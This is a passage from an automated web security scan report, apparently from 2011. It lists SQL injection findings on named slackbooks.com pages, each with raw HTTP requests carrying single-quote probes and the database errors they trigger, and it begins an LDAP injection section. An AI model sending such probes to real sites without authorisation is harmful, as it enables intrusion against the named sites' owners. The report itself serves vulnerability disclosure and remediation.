GET /ccknee?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /ccknee?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.57. http://www.slackbooks.com/clinical+nursing+resources [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /clinical+nursing+resources

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /clinical+nursing+resources' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10149

<html>
<head>
<title>Unclosed quotation mark before the character string 'clinical+nursing+resources''.<br>Line 1: Incorrect syntax near 'clinical+nursing+resources''.</title>
<
...[SNIP]...

Request 2

GET /clinical+nursing+resources'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.58. http://www.slackbooks.com/essentialknee [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /essentialknee' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 05 Feb 2011 22:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'essentialknee''.<br>Line 1: Incorrect syntax near 'essentialknee''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /essentialknee'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 05 Feb 2011 22:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xekihsnsspcr3pi5wrb1km45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.59. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /essentialknee?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /essentialknee?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=q1glzym555hwgv3nndsy4d55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.60. http://www.slackbooks.com/gastroenterology [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /gastroenterology

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /gastroenterology' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10049

<html>
<head>
<title>Unclosed quotation mark before the character string 'gastroenterology''.<br>Line 1: Incorrect syntax near 'gastroenterology''.</title>
<style>
bod
...[SNIP]...

Request 2

GET /gastroenterology'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.61. http://www.slackbooks.com/homemodification [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /homemodification

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /homemodification' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:59:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10049

<html>
<head>
<title>Unclosed quotation mark before the character string 'homemodification''.<br>Line 1: Incorrect syntax near 'homemodification''.</title>
<style>
bod
...[SNIP]...

Request 2

GET /homemodification'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:59:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.62. http://www.slackbooks.com/homemodification [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /homemodification

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /homemodification?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:59:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /homemodification?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:59:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.63. http://www.slackbooks.com/occupational+therapy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /occupational+therapy

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /occupational+therapy' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:01:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10089

<html>
<head>
<title>Unclosed quotation mark before the character string 'occupational+therapy''.<br>Line 1: Incorrect syntax near 'occupational+therapy''.</title>
<style>

...[SNIP]...

Request 2

GET /occupational+therapy'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:01:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12010


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.64. http://www.slackbooks.com/ophthalmic+technology [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ophthalmic+technology

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ophthalmic+technology' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:00:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10099

<html>
<head>
<title>Unclosed quotation mark before the character string 'ophthalmic+technology''.<br>Line 1: Incorrect syntax near 'ophthalmic+technology''.</title>
<style>

...[SNIP]...

Request 2

GET /ophthalmic+technology'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:00:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.65. http://www.slackbooks.com/ophthalmology [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ophthalmology

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ophthalmology' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:01:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'ophthalmology''.<br>Line 1: Incorrect syntax near 'ophthalmology''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /ophthalmology'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:01:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.66. http://www.slackbooks.com/orthopedics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /orthopedics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /orthopedics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9999

<html>
<head>
<title>Unclosed quotation mark before the character string 'orthopedics''.<br>Line 1: Incorrect syntax near 'orthopedics''.</title>
<style>
body {font-fa
...[SNIP]...

Request 2

GET /orthopedics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 05 Feb 2011 22:09:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=33dnlq55duskvq55o1bwound; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.67. http://www.slackbooks.com/pediatrics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /pediatrics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /pediatrics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:01:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9989

<html>
<head>
<title>Unclosed quotation mark before the character string 'pediatrics''.<br>Line 1: Incorrect syntax near 'pediatrics''.</title>
<style>
body {font-fami
...[SNIP]...

Request 2

GET /pediatrics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

2. LDAP injection
There are 3 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

